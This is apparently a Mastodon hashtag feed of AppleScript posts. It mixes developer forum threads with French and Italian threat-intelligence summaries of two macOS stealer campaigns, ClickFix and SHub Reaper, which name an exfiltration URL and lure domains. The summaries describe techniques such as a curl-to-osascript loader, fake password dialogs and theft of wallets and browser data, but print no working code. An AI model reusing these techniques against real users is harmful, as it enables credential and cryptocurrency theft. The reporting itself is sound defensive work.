Mastodawn

📢 macOS ClickFix : un RAT persistant et un stealer AppleScript ciblent Asie, Amérique du Nord et Océanie
📝 ## 🔍 Contexte

Netskope Threat Labs a publié le 17 juin 2026 une a...
📖 cyberveille : https://cyberveille.ch/posts/2026-06-19-macos-clickfix-un-rat-persistant-et-un-stealer-applescript-ciblent-asie-amerique-du-nord-et-oceanie/
🌐 source : https://www.netskope.com/blog/macos-clickfix-lures-deploy-applescript-stealer-persistent-rat
#AppleScript #AppleScript_RAT #Cyberveille

macOS ClickFix : un RAT persistant et un stealer AppleScript ciblent Asie, Amérique du Nord et Océanie

🔍 Contexte Netskope Threat Labs a publié le 17 juin 2026 une analyse technique d’une campagne ClickFix ciblant macOS, interceptée le 31 mai 2026. Cette campagne fait suite à une première vague signalée en avril 2026 et représente une évolution significative : elle intègre désormais un RAT (Remote Access Trojan) persistant en plus d’un infostealer AppleScript. L’attaquant est identifié comme russophone. 🎯 Ciblage et distribution Victimes : principalement en Asie, Amérique du Nord et Océanie Secteurs : technologie, médias, services aux entreprises Infrastructure : 25 domaines leurres éphémères, tous proxifiés via Cloudflare, enregistrés avec le même email administrateur (dbc9a6801423efc7s@ghastlier[.]com) Pages leurres : trois variantes — fausse page utilitaire macOS (“StellarScan Solutions”), fausse page GitHub, page de support IT localisée (Berlin) ⚙️ Chaîne d’infection (entièrement fileless) Social engineering ClickFix : la victime est incitée à copier-coller une commande curl dans le Terminal Stage 1 (loader zsh) : script gzip+base64 évalué en mémoire, effectue : Géofencing CIS : détecte le clavier russe via com.apple.HIToolbox.plist et quitte silencieusement Beacon de télémétrie vers le C2 (IP, locale, hostname, OS, hash de build) Récupération du payload AppleScript via curl pipé directement dans osascript (jamais écrit sur disque) Stage 2 (“Meow DEBUG”) : payload AppleScript exécuté entièrement en mémoire 🦠 Capacités du payload Stage 2 Vol de credentials : fausse boîte de dialogue System Preferences, validation via dscl . authonly, jusqu’à 10 tentatives Vol de données navigateurs : Chrome, Brave, Edge, Opera, Firefox, Safari, Arc, Vivaldi, Orion, Sidekick, Coccoc et autres (cookies, Login Data, Safe Storage keys) Vol de wallets crypto : 25 wallets desktop (Exodus, Electrum, Atomic, Guarda, Coinomi, Sparrow, Wasabi, Bitcoin Core…) + plus de 100 extensions Chromium dont MetaMask Vol de sessions : Telegram (tdata/), Discord (4 variantes), Steam Grab de fichiers : ~/Desktop, ~/Documents (docx, wallet, key, json, rdp, png…) Apple Notes : copie SQLite directe Exfiltration : archive ZIP vers https://qwqerrqwr2145qw.com/gate avec clé API dédiée 💉 Injection de wallets desktop Après exfiltration, le malware cible Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, Trezor Suite :

CyberVeille

Late Night Software Ltd.5d ago

AELint - SDEF validation tool https://forum.latenightsw.com/t/aelint-sdef-validation-tool/5742 #AppleScript

AELint - SDEF validation tool

AELint is a command line tool that validates an application’s scripting interface. The tool identifies common problems in scripting interfaces and can test the non-destructive portions of an application’s scripting interface to ensure the implementation conforms to the interface advertised by the application’s SDEF.

Late Night Software Ltd.

Mark Alldritt 5d ago

AELint is a command line tool that validates an application's scripting interface. The tool identifies common problems in scripting interfaces and can test the non-destructive portions of an application's scripting interface to ensure the implementation conforms to the interface advertised by the application's SDEF.

https://markalldritt.com/?p=1376

#AppleScript #applescripts

AELint

`aelint` validates and tests a scriptable application’s scripting interface.

Mark Alldritt's Journal

J. Alan Henning Jun 11

For work, I've been looking for a lightweight CRM that integrates well with Microsoft Outlook. Not finding what I wanted, I ended up going down a rabbit hole of experimenting with AppleScript.

Seven hours later and I've discovered that either Outlook or AppleScript is bizarrely bug-ridden: it returns the properties of some emails as I need, but not the properties of others, in ways that make no sense, and that render the whole exercise moot. #AppleScript #MicrosoftOutlook

Late Night Software Ltd.May 29

Extreme slowdowns for user interaction in Tahoe https://forum.latenightsw.com/t/extreme-slowdowns-for-user-interaction-in-tahoe/5726 #AppleScript

Extreme slowdowns for user interaction in Tahoe

I write scripts and push them to other users. Tahoe is a major pain. On some, but not all, Tahoe Macs this happens. Every dialog gets a beach ball. It will last for 15 - 45 seconds, and start over for every user action, like type a single character or for every selection in a multiple select list. Scripts are signed. No difference if they are notarized or not. It happens on some Macs, but on very similar Macs same script run just fine. No problmes anywhere when run from Script Debugger/Editor. ...

Late Night Software Ltd.

Late Night Software Ltd.May 28

Myriad Tables Scripts run in SD but not SE https://forum.latenightsw.com/t/myriad-tables-scripts-run-in-sd-but-not-se/5725 #AppleScript

Myriad Tables Scripts run in SD but not SE

Anybody else seeing this error: “The bundle “SMSTableDialogBuilder” couldn’t be loaded because it is damaged or missing necessary resources.” number -4960 from framework “SMSTableDialogBuilder” I get the error when running the script below (and others) from Script Editor, but not Script Debugger. (Also errors in osascript, which is how I first encountered it). I know this script as is has run in the past in SE (not sure about osascript). → Mac OS: 26.4.1 (25E253) → Script Debugger 8.0....

Late Night Software Ltd.

Late Night Software Ltd.May 25

UpDock - AppleScriptable app on App Store https://forum.latenightsw.com/t/updock-applescriptable-app-on-app-store/5724 #AppleScript

UpDock - AppleScriptable app on App Store

Hey, Everyone, a few weeks ago I was looking for beta testers for my new app It’s now on the AppStore and the free version is complete. UpDock+ is available as an in-app purchase (the only IAP) and the app has no adds or subscriptions. UpDock builds on the concept of Apple’s dock. Instead of giving you a single dock on one edge of the screen UpDock lets you create mini-docks on the screen edges apple’s dock doesn’t use. It’s particularly useful for AppleScript work flows, as you can put apps, ...

Late Night Software Ltd.

CyberVeille.ch May 21

📢 SHub Reaper : nouveau stealer macOS usurpant Apple, Google et Microsoft dans une même chaîne d'attaque
📝 ## 🔍 Contexte

Publié le 18...
📖 cyberveille : https://cyberveille.ch/posts/2026-05-21-shub-reaper-nouveau-stealer-macos-usurpant-apple-google-et-microsoft-dans-une-meme-chaine-d-attaque/
🌐 source : https://www.sentinelone.com/blog/shub-reaper-macos-stealer-spoofs-apple-google-and-microsoft-in-a-single-attack-chain/
#AppleScript #Atomic_macOS_Stealer__AMOS_ #Cyberveille

SHub Reaper : nouveau stealer macOS usurpant Apple, Google et Microsoft dans une même chaîne d'attaque

🔍 Contexte Publié le 18 mai 2026 par Phil Stokes sur le blog de SentinelOne, cet article présente l’analyse technique d’une nouvelle variante du stealer macOS SHub, identifiée sous le build tag “Reaper”. Des recherches antérieures de Moonlock, Jamf et Malwarebytes avaient déjà documenté SHub Stealer et ses techniques associées. 🎯 Vecteur d’infection et leurres Reaper utilise de faux installeurs WeChat et Miro comme leurres initiaux, hébergés sur des domaines typosquattés dont mlcrosoft[.]co[.]com (usurpant Microsoft). La chaîne d’infection change de déguisement à chaque étape :

CyberVeille

Italian News by RSS May 19

Punto Informatico: SHub ruba i dati e installa una backdoor su macOS

Una variante del noto infostealer SHub per macOS sfrutta AppleScript per rubare numerosi dati e installare una backdoor che permette l'accesso remoto.
The post SHub ruba i dati e installa una backdoor su macOS appeared first on Punto Informatico.

They stole the data and installed a backdoor on macOS.

A variant of the well-known infostealer SHub for macOS exploits AppleScript to steal numerous data and install a backdoor that allows remote access.
The post SHub steals data and installs a backdoor on macOS appeared first on Punto Informatico.

#AppleScript #first #PuntoInformatico

https://www.punto-informatico.it/shub-ruba-dati-installa-backdoor-macos/

SHub ruba i dati e installa una backdoor su macOS

Una variante del noto infostealer SHub per macOS sfrutta AppleScript per rubare numerosi dati e installare una backdoor che permette l'accesso remoto.

Punto Informatico

Late Night Software Ltd.May 16

A simple "Please wait" message https://forum.latenightsw.com/t/a-simple-please-wait-message/5722 #AppleScript

A simple "Please wait" message

I’ve seen many complex methods for creating a “Please wait” message that can display while an AppleScript does something that takes a long time while showing no activity on screen. I asked Claude Code to come up with something, and it produced the linked code (after a few failed attempts which it managed to fix when prompted to do so):

Late Night Software Ltd.